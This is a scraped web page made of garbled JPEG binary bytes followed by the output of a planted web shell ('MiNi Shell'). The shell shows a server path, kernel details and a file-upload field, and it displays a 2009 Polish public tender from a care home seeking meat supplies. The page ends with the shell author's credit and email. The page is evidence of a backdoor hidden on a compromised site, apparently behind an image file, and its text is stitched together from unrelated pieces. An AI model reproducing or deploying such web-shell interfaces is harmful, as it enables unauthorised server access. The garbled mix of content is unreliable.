JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/76539-N-2009.html

<p class="kh_header"><b>Konstantynów Łódzki: Przetarg nieograniczony w celu wyboru w dniu 29 maja 2009 roku wykonawcy zamówienia na dostawę produktów zwierzęcych, mięsa i produktów mięsnych dla DPS w Konstantynowie Łódzkim</b><br>
<b>Numer ogłoszenia: 76539 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Konstantynowie Łódzkim , ul. Bechcice 3, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 042 2111210, faks 042 2111210 w. 60.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony w celu wyboru w dniu 29 maja 2009 roku wykonawcy zamówienia na dostawę produktów zwierzęcych, mięsa i produktów mięsnych dla DPS w Konstantynowie Łódzkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczanie w okresie od 01.07.2009 do 30.06. 2010 do DPS Konstantynów Ł, własnym transportem i na własny koszt dostawcy, w ilościach zgodnych z bieżącym zamówieniem  produktów zwierzęcych mięsa i produktów mięsnych (CPV 15.10.00.00 -9).  Termin przydatności do spożycia dostarczanych wędlin nie może być krótszy niż 6 dni od daty sprzedaży. W skład zamówienia wchodzi:
--------------------------------------------------------------------------------
I.Mięso - drób - udo z kurczaka - chłodzone zalodowane              -  ilość   1000 kg
                        -  kurczak świeży   - chłodzone zalodowane        -  ilość  1000 kg
                        -  filet z piersi kurczaka- chłodzone zalodowane    - ilość   600 kg
 - wieprzowina - szynka z/k -  chłodzone                                 - ilość  200 kg
 	                 - łopatka bez skóry z/k - chłodzone           -  ilość   150 kg
 	                 - żeberka paski - chłodzone            - ilość    200kg 
                               - wątroba - chłodzone                   - ilość   350 kg
                             - karczek b/k   - chłodzone                 - ilość  100 kg          
II.   Wędliny - kiełbasa krakowska - średniorozdrobniona, parzona, konsystencja
                                                        ścisła, plastry o grubości 1,5-2 mm nie   mogą
                                                        się rozpadać                                          - ilość 600 kg
                 - szynka wieprzowa gotowana - wysokowydajna, nie substytut, produkt 
                soczysty, bez wyraźnego wycieku
                niedopuszczalne złogi tłuszczu   - ilość 24 kg
	           - ogonówka - produkt wędzony nie substytut, soczysty, chudy, bez
                                                     wyraźnego wycieku                                                  - ilość 24 kg
	           - baleron - produkt wysokowydajny, nie substytut, produkt soczysty
                                                bez wyraźnego wycieku, dopuszczalne naturalne przetłuszczenie 		          śródmięśniowe                                                               - ilość  24 kg
	            - kiełbasa biała - wieprzowa, niewędzona, nieparzona, średnio
                                                          rozdrobniona, w osłonkach naturalnych,
			 o gramaturze jedn. ok. 100g                               - ilość 100  kg 
	             - kiełbasa zwyczajna - wysokowydajna z mięsa wieprz-woł.
	                                               wędzona, parzona, średniorozdrobniona     - ilość 450 kg
	             - parówki delikatesowe - parówki wieprzowe, homogenizowane
			                 konsystencja ścisła w osłonkach naturalnych
			                 lub sztucznych                                     - ilość 600 kg
	             - szynka cytrynowa - kiełbasa wysokowydajna z mięsa wieprzowego    				           chuda, gruborozdrobniona                         - ilość 300 kg
	             - szynka biała  - parzona				   - ilość 250 kg
	             - szynka delikatesowa - produkt szynkopodobny z mięsa wieprzowego 
			                 gruborozdrobniony, peklowany, delikatnie 
				przyprawiony, konsystencja ścisła, plaster
			         o grubości 1,5 mm nie może się rozpadać   - ilość 700 kg
                        - pieczeń smakowa - wyrób wieprzowy, drobnorozdrobniony z różnymi
                             dodatkami smakowymi np. warzywami    - ilość 220 kg
                               - szynka drobiowa - produkt z mięsa drobiowego (kurczak lub indyk)
                        gruborozdrobniony, delikatnie przyprawiony
                         konsystencja ścisła, plastry o grub 1,5 mm
                        nie mogą się rozpadać, produkt bez widocznego
                             tłuszczu i ścięgien                                     - ilość 250 kg
mielonka wieprzowa  - produkt parzony, drobnorozdrobniony,
                               konsystencja dość ścisła, plaster o grubości 
                   1,5 mm nie może się rozpadać        - ilość 150 kg     
		    - szynka konserwowa - produkt wysokowydajny z mięsa wieprzowego 
				gruborozdrobnionego, przyprawiony, parzony,      				konsystencja ścisła, plaster ogrubości 1,5 mm
				nie może się rozpadać                         - ilość 300 kg
        III. Wędliny podrobowe - kaszanka - kiszka  krwista z kaszą jęczmienną, parzona,
                                     		             konsystencja ścisła, w osłonkach naturalnych
			             gramatura jednostkowa ok. 100G            - ilość  160 kg
		           - salceson biały - wędlina podrobowa w osłonce naturalnej
				  lub sztucznej, parzona, przyprawiona,
				  konsystencja dość ścisła                     - ilość 30 kg
		           - pasztet wieprzowy pieczony -  pieczony wyrób wieprzowy
		             z podrobami typu wątroba, rozdrobniony z przyprawami
		             smakowymi; konfekcjonowany w formie bloku lub w
		              foremce aluminiowej, zgodnie z wagą zamówienia    -  ilość 30 kg

    ----------------------------------------------------------------------------.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający wymaga, aby:
wykonawca ubiegający się o udzielenie zamówienia spełniał  warunki określone w Art. 22. 1. Ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych (z późn. zmianami).
Z postępowania o udzielenie zamówienia wyklucza się wykonawców określonych w Art. 24.1. Ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych (z późn. zmianami).
Zamawiający oceni spełnianie warunków udziału przez wykonawcę na podstawie złożonego oświadczenia. Ocena spełniania kryteriów przez wykonawców zostanie przeprowadzona wg formuły (spełnia-nie spełnia). Niespełnienie choćby jednego kryterium skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany  jest złożyć wraz ofertą oświadczenie podpisane przez osobę uprawnioną, że spełnia wymogi Art 22.1 oraz 24.1.  Ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych (z późn. zmianami). Zamawiający zaleca wypełnienie Załącznika nr 1 dołączonego do specyfikacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - walory smakowe - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://powiat.pabianice.bip.info.pl/dokument.php?iddok=5294&idmp=887&r=o.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Konstantynowie Łódzkim, 95-050 Konstantynów Łódzki, ul. Bechcice 3 tel. 42 211 12 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: DPS w Konstantynowie Łódzkim (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com